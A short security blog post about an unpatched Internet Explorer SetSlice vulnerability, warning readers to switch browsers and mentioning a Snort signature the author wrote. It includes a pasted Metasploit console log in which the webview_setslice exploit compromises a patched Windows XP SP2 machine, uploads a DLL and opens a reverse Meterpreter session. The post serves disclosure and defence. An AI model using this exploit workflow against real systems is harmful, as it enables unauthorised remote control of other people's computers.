MSIE SetSlice Vuln
This is starting to sound like a broken record, but there's yet another unpatched vulnerability for MSIE with a public exploit. This one was posted to the browser fun blog on July 18th, and Metasploit just released a working exploit about an hour ago.
If you are still using MSIE, it's time to switch browsers. The Internet just isn't a safe place for Internet Explorer right now.
I was able to use this to compromise a fully patched Windows XP SP2 box, as you can see below:
msf exploit(webview_setslice) > exploit
[*] Started reverse handler
[*] Using URL: http://172.30.1.202:8080/slice
[*] Server started.
[*] Exploit running as background job.
msf exploit(webview_setslice) > [*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.30.1.202:4343 -> 172.30.1.213:1056)
msf exploit(webview_setslice) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: WINXP-CLIENT
OS : Windows XP (Build 2600, Service Pack 2).
Update: the Metasploit module source is available here. It supports XP SP0-2.
Update2: I've written a Snort signature for this. It hasn't been fully tested yet; let me know how it works for you.
